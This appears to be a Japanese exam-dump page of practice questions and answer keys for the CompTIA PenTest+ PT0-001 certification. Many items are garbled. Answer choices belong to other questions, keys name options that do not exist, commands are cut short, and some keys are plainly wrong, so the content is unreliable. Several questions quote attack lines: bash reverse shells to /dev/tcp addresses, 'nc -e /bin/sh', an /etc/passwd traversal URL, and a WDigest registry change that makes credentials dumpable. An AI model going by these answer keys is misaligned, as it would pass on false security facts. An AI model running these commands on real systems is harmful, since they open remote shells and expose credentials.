すべての情報を見逃したくないですか?

認定試験に合格するためのヒント

最新の試験ニュースと割引情報

当社の専門家による厳選最新情報

はい、ニュースを送ってください

更新されたCompTIA PenTest+ PT0-001試験データ-成功への道

CompTIA PenTest+PT0-001試験に合格するには、高品質の練習問題と学習教材で準備をすることが極めて重要です。実際の試験環境を正確に反映した信頼できる試験参考書を利用することは、勉強を進める上で必要な部分を特定するのに役立ちます。実際の試験形式と難易度を模擬した模擬試験で自分の準備態勢を確認することができます。よく練られた試験問題と解答は、様々な侵入テストと脆弱性管理のトピックをカバーしており、知識を強化することができます。さらに、評判の高いプロバイダーから提供されているスタディガイドや模擬試験を活用すれば、関連性の高い最新の試験内容に確実に集中することができます。包括的な試験準備資料で十分な準備をすることで、CompTIA PenTest+ PT0-001認定試験に自信を持って取り組めるようになります。
他のオンライン試験を受ける

質問 #1
侵入テスト実施者は、あるウェブアプリケーションのスキャン結果をレビューします。以下の脆弱性のうち、最もクリティカルで、悪用のために優先されるべきものはどれですか?
A. ストアードXSS
B. フィル・パスの開示
C. 期限切れ証明書
D. クリックジャッキング
回答を見る
正解: A
質問 #2
ある内部ネットワーク侵入テストにおいて、テスト実施者は、ターゲットとなる複数のシステムで完全な管理者権限を持つことが判明しているユーザの NTLM パスワードハッシュを復元した。このハッシュをクラックし、平文のパスワードを回復するための努力は失敗に終わっている。
A. オペレーティングシステムWindows 7 オープンポート23, 161
B. オペレーティングシステムWindows Server 2016 オープンポート53, 5900
C. オペレーティングシステムWindows 8
D. オペレーティングシステムWindows 8 オープンポート514, 3389
回答を見る
正解: C
質問 #3
ある侵入テスト者は、1台のワークステーションを侵害した後、最小限の障害でドメイン全体を横方向に移動することができる。次の緩和策のうち、レポートで推奨するのが最も適切なものはどれか。(3つ選択)。
A. クレデンシャルダンプ攻撃
B. DLLインジェクション攻撃
C. 逆シェル攻撃
D. ハッシュ攻撃をパスする
回答を見る
正解: CDE
質問 #4
内部侵入テスト中に、複数のマルチキャストおよびブロードキャスト名前解決要求がネットワークを通過しているのが観察された。ネットワークリソースになりすまし、認証要求を収集するために使用できるツールはどれか。
A. エテルキャップ
B. Tcpdump
C. レスポンダー
D. メドゥーサ
回答を見る
正解: C
質問 #5
あるソフトウェア開発者が、アプリケーションのコードに脆弱性がないかテストしたいと考えています。ソフトウェア開発者が実行すべきプロセスは次のうちどれですか?
A. 脆弱性スキャン
B. ダイナミック・スキャン
C. スタティックスキャン
D. コンプライアンス・スキャン
回答を見る
正解: A
質問 #6
侵入テストの間、テスト者はフィッシングキャンペーンを実行し、Windows 10 OSを実行している内部PCからシェルを受信します。テスト者は、Mimikatzを使ってクレデンシャルのハーベスティングを実行したいと考えています。次のレジストリの変更のうち、メモリにクレデンシャルをキャッシュできるようにするものはどれですか?
A. reg add HKLM⇄System⇄ControlSet002⇄SecurityProviders⇄WDigest /v userLogoCredential /t REG_DWORD /d 0
B. reg add HKCU゠System゠CurrentControl゠Set゠Control゠SecurityProviders゠WDigest /v userLogoCredential /t REG_DWORD /d 1
C. reg add HKLM¥Software¥CurrentControlSet¥Control¥SecurityProviders¥WDigest /v userLogoCredential /t REG_DWORD /d 1
D. reg add HKLM@System@CurrentControl@Set@Control@Security@WDigest /v userLogoCredential /t REG_DWORD /d 1
回答を見る
正解: A
質問 #7
ある侵入テスト実施者が、REST ベースのウェブサービスに対する侵入テストの実施を依頼されました。次のうち、必要な項目はどれですか?
A. 最新の脆弱性スキャン結果
B. リクエスト・リスト
C. 可能性のある悪用の最新リスト
D. テスト口座のサンプルリスト
回答を見る
正解: B
質問 #8
侵入テスト実施者が次のコマンドを実行する。攻撃者が悪用しているローカルホストの脆弱性はどれか。
A. 安全でないファイルパーミッション
B. アプリケーションのホワイトリスト化
C. シェルエスケープ
D. 書き込み可能なサービス
回答を見る
正解: A
質問 #9
ある侵入テスト者がSSHのためにネットワークをスキャンしており、提供されたターゲットのリストを持っている。テスト者は次のNmapコマンドのどれを使うべきか?
A. nmap -p 22 -iL ターゲット
B. nmap -p 22 -sL ターゲット
C. nmap -p 22 -oG ターゲット
D. nmap -p 22 -oA ターゲット
回答を見る
正解: A
質問 #10
あるウェブ・アプリケーションの侵入テストを行っているエンジニアが、ユーザ・ログイン・プロセスが HTTP GET メソッドを使ってフィールド・データから送信していることを発見した。機密情報漏洩のリスクを軽減するために、フォームの送信には HTTP GET メソッドを使うべきである:
A. HTTP POSTメソッド。
B. HTTP OPTIONSメソッド。
C. HTTP PUTメソッド。
D. HTTP TRACEメソッド。
回答を見る
正解: A
質問 #11
あるセキュリティアナリストが、Web アプリケーションのログに不審なリクエストを発見しました。以下の URL:http:www.company-site.com/about.php?i=_V_V_V_V_VetcVpasswdWhich が脆弱性である可能性が最も高い攻撃タイプですか?
A. スコープ・クリープ
B. 死後レビュー
C. リスクの受容
D. 脅威の防止
回答を見る
正解: B
質問 #12
ある攻撃者がSETを使用して、ある企業のクラウドでホストされているWebメールポータルのコピーを作成し、最高経営責任者(CEO)がCEOのログイン認証情報を取得するためにログインすることを期待して電子メールを送信します。これは次のどのタイプの攻撃の例ですか?
A. エリシテーション攻撃
B. なりすまし攻撃
C. スピアフィッシング攻撃
D. ドライブバイダウンロード攻撃
回答を見る
正解: A
質問 #13
corp.localドメインのネットワーク侵入テストの情報収集段階で、ドメインコントローラのリストを提供するコマンドはどれか。
A. nslookup -type=srv _ldap
B. nmap -sV -p 389 - -script=ldap-rootdse corp
C. netグループ「ドメインコントローラー」/ドメイン
D. gpresult /d corp
回答を見る
正解: A
質問 #14
ある会社が、外部IPが100.170.60.5である新しいVPNコンセントレータのインストールに脆弱性があるかどうかを調べるために、ペネトレーションテスターを雇います。VPNが利用可能かどうかをテストするコマンドはどれか。
A. fpipe
B. ike-scan -A -t 1 --sourceip=spoof_ip 100
C. nmap -sS -A -f 100
D. nc 100
回答を見る
正解: B
質問 #15
展示ボタンをクリックしてください。ある侵入テスト実施者がアセスメントを行っているとき、ネットワーク管理者がネットワーク上で問題を引き起こしているパケットサンプルをテスト実施者に見せました。テスターが阻止すべき攻撃は次のうちどれですか。
A. SNMPブルートフォース
B. ARPスプーフィング
C. DNSキャッシュポイズニング
D. SMTPリレー
回答を見る
正解: A
質問 #16
攻撃者のジョーは、被害者の口座から自分の口座に目立たないように送金するつもりです。この攻撃に使用できるURLはどれか。
A. https://testbank
B. https://testbank
C. https://testbank
D. https://testbank
回答を見る
正解: B
質問 #17
b117525b345470c29ca3d8ae0b556ba8セキュリティ・コンサルタントが次のようなパスワード・ハッシュに出くわした場合、正しいハッシュ・タイプは次のうちどれでしょうか?
A. ケルベロス
B. NetNTLMv1
C. NTLM
D. SHA-1
回答を見る
正解: D
質問 #18
ある侵入テスト実施者が、あるシステムに「ゴースト」脆弱性が存在するかどうかを手動で確認したいと考えています。脆弱性を検証する方法として正しいものはどれか。
A. GHOSTファイルをLinuxシステムにダウンロードし、コンパイルgcc -o GHOSTtest i:
B. GHOSTファイルをWindowsシステムにダウンロードし、コンパイルgcc -o GHOST GHOST
C. GHOSTファイルをLinuxシステムにダウンロードし、コンパイルgcc -o GHOST GHOST
D. GHOSTファイルをWindowsシステムにダウンロードし、コンパイルgcc -o GHOSTtest i:
回答を見る
正解: C
質問 #19
ある侵入テスト実施者は、ウェブアプリケーションの侵入テスト中に、コンテンツセキュリティポリシーヘッダが欠落してい ることを観察します。侵入テスト実施者が最も実行しそうな技法はどれですか?
A. コマンドインジェクション攻撃
B. クリックジャッキング攻撃
C. ディレクトリトラバーサル攻撃
D. リモートファイルインクルード攻撃
回答を見る
正解: B
質問 #20
ポストエクスプロイトの間、テスターは、システムバイナリのみがegressフィルタを通過し、以下のコマンドでファイルを格納することを識別します:c:\c:creditcards.db>c:creditcards.dbこのコマンドは、次のファイルシステムの脆弱性のどれを利用していますか?
A. 階層型ファイルシステム
B. 代替データストリーム
C. バックドアの成功
D. 拡張ファイルシステム
回答を見る
正解: B
質問 #21
ある侵入テスト者がSSHのためにネットワークをスキャンしており、提供されたターゲットのリストを持っている。テスト者は次のNmapコマンドのどれを使うべきか?
A. nmap -p 22 -iL ターゲット
B. nmap -p 22 -sL ターゲット
C. nmap -p 22 -oG ターゲット
D. nmap -p 22 -oA ターゲット
回答を見る
正解: A
質問 #22
ある侵入テスト実施者が、あるスクリプトをチェックして、いくつかの基本的な計算エ ラーが持続している理由を調べている。予想される結果は、プログラムが "True "を出力することでした。上記のコンソールからの出力から、スクリプトのエラーを修正する方法を説明するものは次のうちどれですか?(2つ選びなさい)
A. SOW
B. NDA
C. EULA
D. BPA
回答を見る
正解: BD
質問 #23
限られた権限のWindowsシステムで永続性を維持しようとするとき、テスト担当者が使用すべきレジストリキーはどれか。
a. key_classes_root
b. key_local_machine
c. key_current_user
d. key_current_config
回答を見る
正解: C
質問 #24
ペネトレーション・テスターがOSINTを実施するために活用するツールは、次のうちどれでしょうか(2つ選択)。
A. クライアントのMACアドレス
B. ドメインコントローラーのMACアドレス
C. ウェブサーバーのMACアドレス
D. ゲートウェイのMACアドレス
回答を見る
正解: AE
質問 #25
侵入テスト者は、IP 10.0.0.20を持つリモートで侵害されたホストからグラフィックコンソールウィンドウを起動し、IP 192.168.1.10を持つローカルコンピュータにターミナルを表示したいと考えています。このタスクを達成できるのは、次のうちどれでしょうか。
A. リモートコンピュータから、以下のコマンドを実行します:export XHOST 192
B. ローカルコンピュータから、次のコマンドを実行します。ssh -L4444:127
C. リモートコンピュータから、次のコマンドを実行します。ssh -R6000:127
D. ローカルコンピューターから、次のコマンドを実行します: nc -l -p 6000次に、リモートコンピューターから、次のコマンドを実行します: xterm | nc 192
回答を見る
正解: A
質問 #26
ターゲットの外部ドメインでパッシブ偵察を行うのに最も適しているのはどれか?
A. ピーチ
B. CeWL
C. オープンバス
D. 初段
回答を見る
正解: D
質問 #27
スピアフィッシング攻撃の例はどれか。
A. サンプルSOAPメッセージ
B. REST API ドキュメント
C. プロトコルファジングユーティリティ
D. 該当するXSDファイル
回答を見る
正解: A
質問 #28
ペネトレーション・テストを実施する際に、特定された発見を秘密にすることが重要である理由を説明する最も適切なものはどれか。
A. 侵入テストの結果には、企業の知的財産が含まれていることが多い。
B. ペネトレーションテストの結果が公表されれば、消費者の不満につながる可能性がある。
C. 侵入テストの結果は、特権情報を含む法的文書である。
D. ペネトレーション・テストの結果は、攻撃者がシステムを侵害するのに役立つ可能性がある。
回答を見る
正解: D
質問 #29
フルスコープのセキュリティアセスメントにおいて、ターゲットに物理的に関与してソーシャルエンジニアリングするための前提条件はどれか。
A. 非常口の位置
B. 口実を作る
C. ショルダーサーフィン
D. 被害者を尾行する
回答を見る
正解: B
質問 #30
ある会社が、ウェブアプリケーションの侵入テストを実施するためにコンサルタントを雇う計画を立て、予算を確保した。脆弱性が発見されると、その企業はコンサルタントに次のタスクを実行するよう依頼しました。
A. サービス一覧
B. OSINTの収集
C. ポートスキャン
D. ソーシャル・エンジニアリング
回答を見る
正解: A
質問 #31
nmap -aV192.168.1.5組織では、その環境からTelnetを無効にしているという。しかし、Nmapスキャンの結果は、ポート22が閉じており、ポート23がSSHに対して開いていることを示している。次のうち、何が起こったかを説明する最も適切なものはどれか。
A. 組織がTelnetを無効にすることに失敗しました。
B. Nmapの結果にポート23の誤検出が含まれている。
C. ポート22がフィルタリングされた。
D. サービスが標準以外のポートで実行されている。
回答を見る
正解: A
質問 #32
ペネトレーションテスト契約における次の特性のうち、本番システムを最も高い負荷で観察し、テストする上で、最も大きな影響を与えるものはどれか。
A. 重要な生産システムのスコープの作成
B. テストアクセス時間のスケジュール設定
C. ホワイトボックス・テストのエンゲージメントを確立する
D. 管理職が侵入的テストにサインオフすること
回答を見る
正解: B
質問 #33
ある侵入テスト者は、邪悪な双子の配備に成功し、被害者のトラフィックを確認し始めている。侵入テスト者が取りたい次のステップは、暗号化されていない被害者のウェブトラフィックをすべてキャプチャすることです。この目標を達成するのに最適なものはどれか?
A. HTTPダウングレード攻撃を行う。
B. トラフィックを復号化するためにユーザー認証情報を採取する。
C. MITM攻撃を行う。
D. 信頼できるCAになりすましてCA攻撃を実施する。
回答を見る
正解: A
質問 #34
電気事業施設、天然ガス施設、ダム、原子力施設などで使用されているICSの重大なセキュリティ上の弱点について、最も適切なものはどれか。
A. ICSベンダーは、適切なセキュリティ管理の実装が遅れている。
B. ICSスタッフは、基本的な職務を遂行するための十分な訓練を受けていない。
C. 重要な機器の交換機器が不足している。
D. ICS施設のコンプライアンスが欠如している。
回答を見る
正解: B
質問 #35
ある侵入テスト実施者が、貴重なデータベースを含む特定のホストの脆弱性スキャンを実施し、以下の脆弱性を特定した。
A. SQLインジェクション
B. HTTP DELETEメソッドが許可されている
C. CSRFの脆弱性
D. XSS
回答を見る
正解: B
質問 #36
ある侵入テスト担当者が、ある範囲のIPアドレスのすべてのRPTRレコードを発見する方法をスクリプト化したいと考えています。利用するのに最も効率的なのはどれか。
A. nmap -p 53 -oG dnslist
B. nslookup -ns 8
C. for x in {1
D. dig -r > echo "8
回答を見る
正解: A
質問 #37
http://example.com/download.php?id-.../.../.../etc/passwdWhich、上記の攻撃を最もよく表しているのはどれか?
A. 悪意のあるファイルアップロード攻撃
B. リダイレクト攻撃
C. ディレクトリトラバーサル攻撃
D. 安全でない直接目的語参照攻撃
回答を見る
正解: C
質問 #38
ウェブアプリケーションの評価中に、侵入テスト者はサーバ上で任意のコマンドが実行できることを発見しました。この攻撃をさらに一歩進めたいと考え、侵入テスト者は 192.168.1.5 にある攻撃マシンに戻るリバースシェルを得る方法を探り始めます。次のうち、可能な方法はどれか。(2つ選んでください)。
A. IoT機器を開発するメーカーは、セキュリティへの関心が低い。
B. 管理者が全社的に同じセキュリティ基準を導入するのは難しい。
C. IoTシステムは、よりセキュアなソリューションが必要とするハードウェアパワーに欠けていることが多い。
D. 規制当局は、IoTシステムのセキュリティ要件を低く設定していることが多い。
回答を見る
正解: BC
質問 #39
侵入テスト実施者は、次のどの理由から、顧客の連絡先情報を常に入手できるようにしておく必要がありますか?(3つ選んでください)。
A. LSASS
B. SAMデータベース
C. アクティブ・ディレクトリ
D. レジストリ
回答を見る
正解: ACF
質問 #40
ある侵入テスト者がWindowsサーバーに侵入し、永続性を達成しようとしている。次のうちどれがその目標を達成できるか?
A. schtasks
B. net セッションサーバー|dsquery -ユーザー|net use c$
C. powershell && set-executionpolicy unrestricted
D. reg保存 HKLM
回答を見る
正解: D
質問 #41
ある侵入テスト実施者が、業務に対する全体的なリスクレベルを概説する報告書を書いている最中である。ペネトレーション・テスターは、報告書の次のどの部分にこれを書くべきでしょうか?
A. 水平方向に権限をエスカレートさせる。
B. 非表示フィールドのページをスクレイピングする。
C. HTTPレスポンスコードを分析する。
D. HTTPヘッダを検索する。
回答を見る
正解: B
質問 #42
悪用された脆弱性が、実行中の複数のアプリケーション・コンテナに同時に影響を及ぼす可能性が最も高いのは、次のどのコンポーネントですか?
A. 共通ライブラリ
B. 設定ファイル
C. サンドボックスからの脱出
D. ASLRバイパス
回答を見る
正解: A
質問 #43
ある会社が、侵入テスト実施者に、社内で開発されたアンドロイド・アプリケーションのセキュリ ティのレビューを依頼した。侵入テスト者は、評価をサポートするために APK ファイルを受け取った。侵入テスト者は、APK ファイルに対して SAST を実行したい。侵入テスト実施者は、次の準備手順のうちどれを最初に行う必要がありますか?(2つ選択してください)。
A. 旧式のソフトウェアには悪用可能なコンポーネントが含まれている可能性がある。
B. 脆弱なパスワード管理方法を採用している可能性がある。
C. 暗号的に弱いプロトコルは傍受される可能性がある。
D. ウェブサーバーの設定によって機密情報が漏れる可能性がある。
回答を見る
正解: AB
質問 #44
ある侵入テスト実施者が、無線スニッファーから出力された以下の情報を確認している。
A. 恐怖の原理
B. 権威の原則
C. 希少性の原理
D. 類似性の原理
E. 社会的証明の原則
回答を見る
正解: C
質問 #45
ある侵入テスト実施者が、危険な状態から次のことを実行する。「python -c 'import pty;pty.spawn ("/bin/bash") '.テスト実施者が取っている行動はどれか?
A. Bash履歴の削除
B. シェルのアップグレード
C. サンドボックスの作成
D. クレデンシャルの取得
回答を見る
正解: B
質問 #46
あるクライアントが、最近解雇されたヘルプデスク技術者を模倣するよう侵入テスト実施者に要求しました。脅威行為者の能力を最もよく表しているのはどれか。
A. 高度な持続的脅威
B. スクリプト・キディ
C. ハクティビスト
D. 組織犯罪
回答を見る
正解: B
質問 #47
最高経営責任者(CEO)から最高財務責任者(CFO)に送信された電子メールに、新しいベンダーへの支払いに電信送金が必要であると書かれています。どちらもそのベンダーのことは知らず、CEOは電子メールの送信を否定しています。この攻撃で使用された動機は、次のどのタイプですか?
A. Webサーバーの暗号化設定を変更し、暗号化、ハッシュ化、およびデジタル署名に、より強力な暗号スイート(cipher-suite)を使用する。
B. アプリケーションにアクセスする際のリスクを認識するための新しいトレーニングを実施する。このトレーニングは、脆弱性にパッチが適用された後に廃止することができる。
C. アプリケーションへのアクセスを財務部門のみに制限するACLを実装する。C
D. 給与支払ユーザに対して、アプリケーションの認証に使用するパスワードの変更を要求する。脆弱性のパッチ適用後、パスワードの変更を再度要求する。
回答を見る
正解: B
質問 #48
bash -i >& /dev/tcp/10.2.4.6/443 0> &1前のコマンドを成功させるために、テスターのLinuxシステムで実行する必要がある追加コマンドはどれか。
A. nc -nlvp 443
B. nc 10
C. nc -w3 10
D. nc -e /bin/sh 10
回答を見る
正解: D
質問 #49
あるセキュリティコンサルタントが、今度の侵入テストの範囲を概説した文書を受け取る。この文書には、IPアドレスと、それぞれをスキャンできる時間が記載されています。この情報が含まれているのは、次のうちどれでしょうか?
A. 交戦規定
B. 提案依頼
C. マスター・サービス契約
D. ビジネスインパクト分析
回答を見る
正解: A
質問 #50
chmod 4111 /usr/bin/sudo今、悪用される可能性のある問題はどれか?
A. カーネルの脆弱性
B. スティッキー・ビット
C. 引用されていないサービスパス
D. sudoの設定ミス
回答を見る
正解: B
質問 #51
b117525b345470c29ca3d8ae0b556ba8セキュリティ・コンサルタントが次のようなパスワード・ハッシュに出くわした場合、正しいハッシュ・タイプは次のうちどれでしょうか?
A. ケルベロス
B. NetNTLMv1
C. NTLM
D. SHA-1
回答を見る
正解: D
質問 #52
悪用されたマシンの履歴ファイルに次の行がありました。攻撃者は次のコマンドを実行しました:bash -i >& /dev/tcp/192.168.0.1/80 0> &1このコマンドが何を行うかを説明しているのは次のうちどれですか?
A. 鍵開け
B. 出口センサーのトリガー
C. ロックバンピング
D. ロックバイパス
回答を見る
正解: C
質問 #53
ある警備員が、バッジをスキャンして入館する個人を目撃しました。警備員はバッジシステムを監査し、過去30分以内に問題のバッジのログエントリが2つあることを発見しました。次のうち、最も可能性が高いのはどれですか?
A. バッジはクローンだった。
B. 物理アクセス制御サーバが故障している。
C. システムはクロスオーバーエラー率に達した。
D. 従業員がバッジを紛失した。
回答を見る
正解: A
質問 #54
ある侵入テスト実施者が API テストを実施する準備をしている。この任務の準備に最も役立つのはどれか。
A. ニクト
B. 戦争
C. W3AF
D. スワガー
回答を見る
正解: D
質問 #55
侵入テスト者は、ドメインコントローラへのフルシェルを持っており、21日間にドメインに認証されていないユーザーアカウントを発見したい。次のコマンドのどれが最もよくこれを達成するか?
A. dsrm -users ?€DN=company
B. dsuser -name -account -limit 3
C. dsquery user -inactive 3
D. dsquery -o -rdn -limit 21
回答を見る
正解: D
質問 #56
物理的侵入テスト者のテストシナリオでは、侵入テスト者はラップトップに物理的にアクセスする。ノートパソコンはログインしているがロックされている。デバイスからクレデンシャルを抽出するための次のステップの可能性はどれですか?
A. ユーザーのパスワードをブルートフォースする。
B. ARPスプーフィング攻撃を行う。
C. BeEFフレームワークを活用してクレデンシャルを取得する。
D. LLMNR/NETBIOS-nsポイズニングを行う。
回答を見る
正解: A
質問 #57
物理的侵入テスト者のテストシナリオでは、侵入テスト者はラップトップに物理的にアクセスする。ノートパソコンはログインしているがロックされている。デバイスからクレデンシャルを抽出するための次のステップの可能性はどれですか?
A. パスワードのブルートフォース。
B. ARPスプーフィング攻撃を行う。
C. BeEFフレームワークを活用してクレデンシャルを取得する。
D. LLMNR/NETBIOS-nsポイズニングを行う。
回答を見る
正解: A
質問 #58
ある侵入テスト者が、ポート443経由で任意のホストに無制限にネットワークアクセスできるシステムを侵害する。侵入テスト者は、被害者から攻撃者に戻るリバースシェルを作成したいと考えています。侵入テスト者が最も使用しそうな方法はどれですか?
A. perl -e 'use SOCKET'; $i='; $p='443;
B. ssh superadmin@-p 443
C. nc -e /bin/sh443
D. bash -i >& /dev/tcp//443 0>&1
回答を見る
正解: D
質問 #59
侵入テスト実施者が、作業終了時にchkconfig --del servicenameコマンドを実行する理由はどれか。
A. アープスプーフ
B. nmap
C. レスポンダー
D. バープスイート
回答を見る
正解: A
質問 #60
侵入テスト実施者がテスト中にシステム所有者/クライアントと連絡を取ることになる状況は、次のうちどれでしょうか?
A. 重要な脆弱性に対しては、リスクを最小化するための容易な代償措置を適用し、その後、是正の優先順位を付け直す。
B. 最も早く改善できる問題を特定し、まずそれに対処する。
C. 重要な脆弱性のうち、最も影響の少ない脆弱性の是正を最初に実施し、その後で他の重要な脆弱性に対処する。
D. 他の脆弱性の修正に非常に長い時間がかかるとしても、最も重要な脆弱性を最初に修正する。
回答を見る
正解: BD
質問 #61
HOTSPOT指示:次の攻撃シグネチャが与えられたら、攻撃の種類を決定し、今後その攻撃を防ぐための関連する改善策を特定してください。シミュレーションの初期状態に戻したい場合は、「すべてリセット」ボタンをクリックしてください。あなたは、ウェブサーバの堅牢化を担当するセキュリティアナリストです:
A. 答えは解説セクションを参照。
回答を見る
正解: A
質問 #62
警備員が、バッジをスキャンして入館する個人を観察している。この施設では、バッジの入室と退室が厳格に義務付けられており、ターンテーブルが設置されている。警備員はバッジシステムを監査し、過去30分以内に問題のバッジのログエントリが2つあることを発見しました。次のうち、最も可能性が高いのはどれですか?
A. バッジはクローンだった。
B. 物理アクセス制御サーバーが故障している。
C. システムはクロスオーバーエラー率に達した。
D. 従業員がバッジを紛失した。
回答を見る
正解: A
質問 #63
Metasploitで侵入テスト者がインターネットからプライベートネットワークにアクセスできるようにするコマンドはどれか。
A. set rhost 192
B. run autoroute -s 192
C. db_nmap -iL /tmp/privatehosts
D. 補助サーバー/サーバー/socks4aを使用する。
回答を見る
正解: A
質問 #64
NDAの目的は次のうちどれですか?
A. 両当事者間の守秘義務に関する条件を概説する。
B. テストが許可されるシステムの境界を概説する。
C. 許可される技術試験の要件を概説する。
D. ネットワークの詳細な構成について説明する。
回答を見る
正解: A
質問 #65
クライアントのネットワーク上にいない侵入テスト者が、Nmapを使ってスコープ内のホストのネットワークをスキャンしている。侵入テスト者は、コマンド:nmap 100.100/1/0-125の応答を受け取っていない。結果を返すには、次のコマンドのどれがBESTか?
A. nmap -Pn -sT 100
B. nmap -sF -p 100
C. nmap -sV -oA output 100
D. nmap 100
回答を見る
正解: A
質問 #66
次のPythonスクリプトがあったとする。
A. スクリーンへ
B. ネットワークサーバーへ
C. ファイルへ
D. /dev/nullへ
回答を見る
正解: C
質問 #67
ある顧客が侵入テスト実施者に、新しいウェブアプリケーションの可用性を評価するよう依頼しています。テスターが使用すべき攻撃のタイプはどれですか?
A. TCP SYNフラッド
B. SQLインジェクション
C. XSS
D. XMASスキャン
回答を見る
正解: B
質問 #68
ターゲットの外部ドメインでパッシブ偵察を行うのに最も適しているのはどれか。
A. ピーチ
B. CeWL
C. OpenVAS
D. 初段
回答を見る
正解: D
質問 #69
単純なバッファ・オーバーフローを悪用するために、ペネトレーション・テスターが上書きする必要があるCPUレジスタはどれか?
A. スタックポインタレジスタ
B. インデックス・ポインタ・レジスタ
C. スタックベースポインタ
D. デスティネーション・インデックス・レジスタ
回答を見る
正解: A

送信後に回答を表示する

質問の回答を得るには、電子メールと WhatsApp を送信してください。

注: 正しい試験結果を得ることができるように、電子メール ID と WhatsApp が有効であることを確認してください。

Eメール:
WhatsApp/電話番号: